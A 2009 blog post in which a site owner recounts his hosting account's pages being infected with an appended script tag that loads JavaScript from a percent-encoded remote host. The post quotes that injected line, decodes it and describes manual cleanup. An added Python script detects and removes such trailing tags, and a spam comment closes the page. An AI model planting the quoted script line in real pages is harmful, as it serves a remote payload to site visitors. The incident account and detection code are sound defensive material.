25 Mar 2009 @ 8:03 AM 

I couldn’t access my blog http://aeric.poon.my or open the demo page http://demo.poon.my, so I submitted a ticket to hosting support. I got a reply telling me that there is a vulnerability in my scripts. All my ASP.NET and PHP pages have the following line appended:

<script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>

Opening the link in a browser decodes it into this link:

http://www.51of.net.com/img.gif

but this page is invalid.

Changing the link to:

http://www.51of.net

redirects to an under-construction China WAP service website.

I hope this issue will not happen again.

Warning: Please do not open the red colour links above. Open the links at your own risk if you insist.

Updates:

I received a reply from Dan at the hosting customer support that no virus infection has taken place. Dan said the company will have the server patched and advised me to take some prevention steps such as imposing a more complex password and restoring my code.

Updates:

I found that not only PHP and ASPX files became victims; HTML pages (*.html and *.htm) and classic ASP files also couldn’t escape from the vulnerability. I have deleted some of the unused files and folders. Redownloading WordPress and reuploading all the files doesn’t help much. Some files from the older version still exist in the folder. Other files for add-on themes and plug-ins are also infected. So I need to check every folder and subfolder and remove the last line from each of the files. This is such crazy work to do. I have also changed the FTP password and SQL database password to stronger ones. I really hope I will not need to do this again.

For your information, all the files affected by this injection have the code at the bottom of the page. If it is an HTML page, the line of code is appended after the closing </html> tag. However, the modified dates of these files have not changed. I wonder how the hacker is so smart as to be able to access the server to change the files… How can he upload something and gain permission to execute some kind of command…? Is he really able to guess my FTP password through some kind of brute-force technique…? Or is it just a simple trick to post some hacker message in my blog using the eval() JavaScript function…? And without leaving any track…? However, this incident has given me experience in securing my domain.

Posted By: Aeric
Last Edit: 26 Mar 2009 @ 11:45 PM
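
The manual cleanup described in the post (checking every folder and removing the appended last line) can be scripted. The following is an added example, not code from the original post: the function names and the SAMPLE page are constructed for illustration, and it assumes the injected tag is the whole last non-blank line of each file, as the post describes.

```python
import os
import re
from urllib.parse import unquote

EXTS = (".php", ".aspx", ".asp", ".html", ".htm")  # file types named in the post
# A remote <script src=...> tag occupying the whole line.
TAIL_SCRIPT = re.compile(
    r"""^\s*<script\b[^>]*\bsrc\s*=\s*["']?(https?://[^\s"'>]+)["']?[^>]*>\s*</script>\s*$""",
    re.IGNORECASE)
# Constructed sample: a page followed by the tag quoted in the post.
SAMPLE = ("<html><body>demo</body></html>\n"
          "<script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>\n")

def find_trailing_injection(text):
    """Return the decoded src URL if the last non-blank line is a remote
    <script> tag with a percent-encoded host, else None."""
    lines = text.rstrip().splitlines()
    m = TAIL_SCRIPT.match(lines[-1]) if lines else None
    if not m:
        return None
    url = m.group(1)
    host = url.split("://", 1)[1].split("/", 1)[0]
    # Percent-escapes in the host are the obfuscation seen in the post;
    # ordinary script includes do not encode their hostname.
    return unquote(url) if "%" in host else None

def strip_trailing_injection(text):
    """Drop the injected last line; return clean text unchanged."""
    if find_trailing_injection(text) is None:
        return text
    return "\n".join(text.rstrip().splitlines()[:-1]) + "\n"

def scan(root):
    """Return {path: decoded_url} for infected files under root. Content is
    inspected because the post notes the modified dates did not change."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                url = find_trailing_injection(fh.read())
            if url:
                hits[path] = url
    return hits
```

Run scan() over a downloaded copy of the web root and review the hits before rewriting any file with strip_trailing_injection().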


Responses to this post » (2 Total)

 
  1. Aeric says:

    One of my colleagues said her forum website also suffered a similar attack.

  2. Nazarplen says:

    I wish to thank you pertaining to your website. You’ve got a great deal of unique articles consequently the website is very helpful. I’m a university student in California state and I have got a critical term paper due immediately. I am just having problems and currently have writer’s block at the moment as I am researching. Need someone to help me modify the free essay I ran across using the net analysis of college pressures essay. That report satisfies my personal prerequisites nevertheless is authored in an undesirable fashion and there are grammar blunders. Do you consider I would proceed? I’m simply just anxious for aid, hence any hint would be terrific.
